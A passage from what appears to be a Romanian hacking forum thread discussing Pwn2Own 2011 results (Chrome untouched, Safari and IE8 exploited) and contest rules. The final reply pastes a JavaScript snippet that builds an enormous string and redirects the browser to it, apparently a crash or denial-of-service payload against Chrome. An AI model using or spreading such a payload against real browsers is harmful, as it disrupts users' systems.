Jump to content
rob33rt

Competitia de hacking: Chrome ramane neatins. Safari si IE8 - victime sigure

Recommended Posts

Saptamana aceasta a demarat cea mai renumita competitie de hacking, Pwn2Own, competitie in care Google a pariat 20.000 de dolari pe Chrome. Si a castigat! In prima zi de concurs nicio echipa nu a reusit sa exploateze vulnerabilitatile din browser-ul Google.

Nici nu au fost prea multi la numar cei care s-au aventurat sa isi masoare fortele cu sistemul Google. Chrome a inregistrat numai doi participanti dornici sa incerce hackuirea browserului.

Daca, pana la sfarsitul competitiei, browser-ul Google ramane neatins, va inregistra un adevarat record, fiind al treilea an in care participantii nu reusesc sa ii exploateze sistemul de securitate.

hack-google-chrome_1.jpg

Nu la fel de norocoasi au fost cei de la Apple si Microsoft, care au cazut in mainile primilor hackeri care si-au incercat norocul cu ele.

Desi in ziua concursului Apple a updatat Safari la versiunea 5.0.4, reparand 64 de vulnerabilitati, o echipa de hackeri tot a reusit sa sparga browser-ul. De-a dreptul jenant pentru baietii din Cupertino este timpul in care s-a reusit acest luccru: 5 secunde!!!

hack-google-chrome.jpg

Echipa de hackeri a plecat acasa cu 15.000 de dolari si un MacBook Air nou-nout.

De Internet Explorer 8 s-a ocupat specialistul in securitate Stephen Fewer, care a folosit un trio de vulnerabilitati pentru a hackui browser-ul instalat pe un Windows 7.

Astazi este ultima zi a competitiei, iar vanatorii de brese de securitate vor testa siguranta platformelor pentru smartphone-uri de la Apple (iOS), Google (Android), Microsoft (Windows Phone 7) si RIM (BlackBerry OS).

Sursa:

http://www.computerworld.com/s/article/9214022/Google_s_Chrome_untouched_at_Pwn2Own_hack_match?source=CTWNLE_nlt_dailyam_2011-03-10

Link to comment
Share on other sites

Regulile sunt destul de clare. Tu trebuie sa dovedesti ca poti executa cod arbitrar pe computerul victimei, pe langa faptul trebuie sa dovedesti ca ai acces asupra hard disk-ului (implicit ai facut bypass la sandbox).

Am scris si eu despre asta.

Tinkode gaseste chestii interesante, dar nu se compara cu avengura problemelor de securitate care se discuta acolo. E un alt nivel, alte tehnici, alt domeniu (Chrome e un browser, Tinkode se specializeaza pe partea de web, cel putin pana acum). :)

Link to comment
Share on other sites

Desi in ziua concursului Apple a updatat Safari la versiunea 5.0.4, reparand 64 de vulnerabilitati, o echipa de hackeri tot a reusit sa sparga browser-ul. De-a dreptul jenant pentru baietii din Cupertino este timpul in care s-a reusit acest luccru: 5 secunde!!!

5 secunde pe draqu:))

Link to comment
Share on other sites

Guest Praetorian
Care sunt regulile in competitiile astea ? Ce considera ei vulnerabilitate demna sa ia premiul cel mare?

Am vazut ca si @TinKode a gasit cateva si nu i-au dat nimic .

Nimic nu inseamna chiar nimic. Nu totul se rezuma la bani uneori.

In cazul competitiei de mai sus nu e vorba despre ce am mai gasit si eu cu Sony, e vorba despre browsere, sa gasesti vulnerabilitati in ele, cum spunea si AndrewBoy.

La partea de web, trebuie sa gasesti vulnerabilitati care pun in pericol securitatea utilizatorilor google.com ca sa fie calificate pentru o suma de bani (dar asta nu inseamna ca si una care nu ii pune, nu este importanta).

Alea 5 secunde de care va mirati toti, stati fara griji ca au venit cu temele de acasa, nu le-au pus un alt browser fata de cel pe care il stiau si au mai facut teste pe el.

Link to comment
Share on other sites

Google Chrome: --- >


<script type="text/javascript">

function mul(str,count){
if(count==0) return '';
var binaryCount = count.toString(2);
var numDegree = binaryCount.length;
var resultStr='';
for(var i=0; i<numDegree; i++){
resultStr+=resultStr;
if(binaryCount.charAt(i) == '1'){
resultStr+=str;
}
}
return resultStr;
}

var junka = "a";

var junk = mul(junka,2304453);


window.location.replace("http://" + junk);

</script>
</head>
<body>

</body>
</html>


La asta va referiti ?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...